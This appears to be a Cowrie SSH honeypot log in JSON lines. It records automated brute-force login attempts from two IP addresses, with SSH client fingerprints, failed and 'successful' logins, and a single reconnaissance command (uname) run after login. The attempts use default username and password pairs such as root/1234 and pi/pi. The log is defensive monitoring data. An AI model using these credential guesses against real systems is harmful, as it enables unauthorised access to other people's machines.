{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:47.679971Z","src_ip":"212.227.125.160","session":"641660600a54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34974,"dst_ip":"1.2.3.4","dst_port":22,"session":"91a0563c2fe2","protocol":"ssh","message":"New connection: 212.227.125.160:34974 (1.2.3.4:22) [session: 91a0563c2fe2]","sensor":"my-vps","timestamp":"2025-08-26T11:37:52.258008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:52.282823Z","src_ip":"212.227.125.160","session":"91a0563c2fe2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:52.323328Z","src_ip":"212.227.125.160","session":"91a0563c2fe2"}
{"eventid":"cowrie.login.failed","username":"devmon","password":"devmon","message":"login attempt [devmon/devmon] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:52.850178Z","src_ip":"212.227.125.160","session":"91a0563c2fe2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:54.010204Z","src_ip":"212.227.125.160","session":"91a0563c2fe2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35748,"dst_ip":"1.2.3.4","dst_port":22,"session":"293196fb8223","protocol":"ssh","message":"New connection: 212.227.125.160:35748 (1.2.3.4:22) [session: 293196fb8223]","sensor":"my-vps","timestamp":"2025-08-26T11:37:58.603661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:58.604774Z","src_ip":"212.227.125.160","session":"293196fb8223"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:58.662261Z","src_ip":"212.227.125.160","session":"293196fb8223"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:58.834345Z","src_ip":"212.227.125.160","session":"293196fb8223"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:59.888077Z","src_ip":"212.227.125.160","session":"293196fb8223"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":44390,"dst_ip":"1.2.3.4","dst_port":22,"session":"f53b2ddc9b10","protocol":"ssh","message":"New connection: 83.168.105.65:44390 (1.2.3.4:22) [session: f53b2ddc9b10]","sensor":"my-vps","timestamp":"2025-08-26T11:38:01.898077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:01.899338Z","src_ip":"83.168.105.65","session":"f53b2ddc9b10"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:01.935506Z","src_ip":"83.168.105.65","session":"f53b2ddc9b10"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:02.047876Z","src_ip":"83.168.105.65","session":"f53b2ddc9b10"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:03.086858Z","src_ip":"83.168.105.65","session":"f53b2ddc9b10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36516,"dst_ip":"1.2.3.4","dst_port":22,"session":"41ec741ef701","protocol":"ssh","message":"New connection: 212.227.125.160:36516 (1.2.3.4:22) [session: 41ec741ef701]","sensor":"my-vps","timestamp":"2025-08-26T11:38:04.281091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:04.281790Z","src_ip":"212.227.125.160","session":"41ec741ef701"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:04.498057Z","src_ip":"212.227.125.160","session":"41ec741ef701"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:38:04.663467Z","src_ip":"212.227.125.160","session":"41ec741ef701"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:38:04.857554Z","src_ip":"212.227.125.160","session":"41ec741ef701"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:38:04.858309Z","src_ip":"212.227.125.160","session":"41ec741ef701"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:04.910277Z","src_ip":"212.227.125.160","session":"41ec741ef701"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:04.911464Z","src_ip":"212.227.125.160","session":"41ec741ef701"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37252,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d0d084fa03e","protocol":"ssh","message":"New connection: 212.227.125.160:37252 (1.2.3.4:22) [session: 6d0d084fa03e]","sensor":"my-vps","timestamp":"2025-08-26T11:38:10.484974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:10.509483Z","src_ip":"212.227.125.160","session":"6d0d084fa03e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:10.541062Z","src_ip":"212.227.125.160","session":"6d0d084fa03e"}
{"eventid":"cowrie.login.failed","username":"ec2","password":"ec2","message":"login attempt [ec2/ec2] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:10.780852Z","src_ip":"212.227.125.160","session":"6d0d084fa03e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:11.832819Z","src_ip":"212.227.125.160","session":"6d0d084fa03e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38056,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb266c89ccbf","protocol":"ssh","message":"New connection: 212.227.125.160:38056 (1.2.3.4:22) [session: eb266c89ccbf]","sensor":"my-vps","timestamp":"2025-08-26T11:38:16.056564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:16.057586Z","src_ip":"212.227.125.160","session":"eb266c89ccbf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:16.108037Z","src_ip":"212.227.125.160","session":"eb266c89ccbf"}
{"eventid":"cowrie.login.failed","username":"nxautomation","password":"nxautomation","message":"login attempt [nxautomation/nxautomation] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:16.276227Z","src_ip":"212.227.125.160","session":"eb266c89ccbf"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:17.328933Z","src_ip":"212.227.125.160","session":"eb266c89ccbf"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43172,"dst_ip":"1.2.3.4","dst_port":22,"session":"81c8adc443d3","protocol":"ssh","message":"New connection: 83.168.105.65:43172 (1.2.3.4:22) [session: 81c8adc443d3]","sensor":"my-vps","timestamp":"2025-08-26T11:38:17.408763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:17.409562Z","src_ip":"83.168.105.65","session":"81c8adc443d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:17.448969Z","src_ip":"83.168.105.65","session":"81c8adc443d3"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:38:17.569848Z","src_ip":"83.168.105.65","session":"81c8adc443d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:38:17.748324Z","src_ip":"83.168.105.65","session":"81c8adc443d3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:38:17.749143Z","src_ip":"83.168.105.65","session":"81c8adc443d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:17.790026Z","src_ip":"83.168.105.65","session":"81c8adc443d3"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:17.791182Z","src_ip":"83.168.105.65","session":"81c8adc443d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38830,"dst_ip":"1.2.3.4","dst_port":22,"session":"914cc8c56f2e","protocol":"ssh","message":"New connection: 212.227.125.160:38830 (1.2.3.4:22) [session: 914cc8c56f2e]","sensor":"my-vps","timestamp":"2025-08-26T11:38:22.152111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:22.152991Z","src_ip":"212.227.125.160","session":"914cc8c56f2e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:22.203988Z","src_ip":"212.227.125.160","session":"914cc8c56f2e"}
{"eventid":"cowrie.login.failed","username":"cp_extensions","password":"cp_extensions","message":"login attempt [cp_extensions/cp_extensions] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:22.364862Z","src_ip":"212.227.125.160","session":"914cc8c56f2e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:23.555451Z","src_ip":"212.227.125.160","session":"914cc8c56f2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39598,"dst_ip":"1.2.3.4","dst_port":22,"session":"80065ca669eb","protocol":"ssh","message":"New connection: 212.227.125.160:39598 (1.2.3.4:22) [session: 80065ca669eb]","sensor":"my-vps","timestamp":"2025-08-26T11:38:28.264277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:28.267796Z","src_ip":"212.227.125.160","session":"80065ca669eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:28.325463Z","src_ip":"212.227.125.160","session":"80065ca669eb"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:28.538041Z","src_ip":"212.227.125.160","session":"80065ca669eb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:29.593871Z","src_ip":"212.227.125.160","session":"80065ca669eb"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47432,"dst_ip":"1.2.3.4","dst_port":22,"session":"97770153f6ea","protocol":"ssh","message":"New connection: 83.168.105.65:47432 (1.2.3.4:22) [session: 97770153f6ea]","sensor":"my-vps","timestamp":"2025-08-26T11:38:33.058803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:33.059647Z","src_ip":"83.168.105.65","session":"97770153f6ea"}
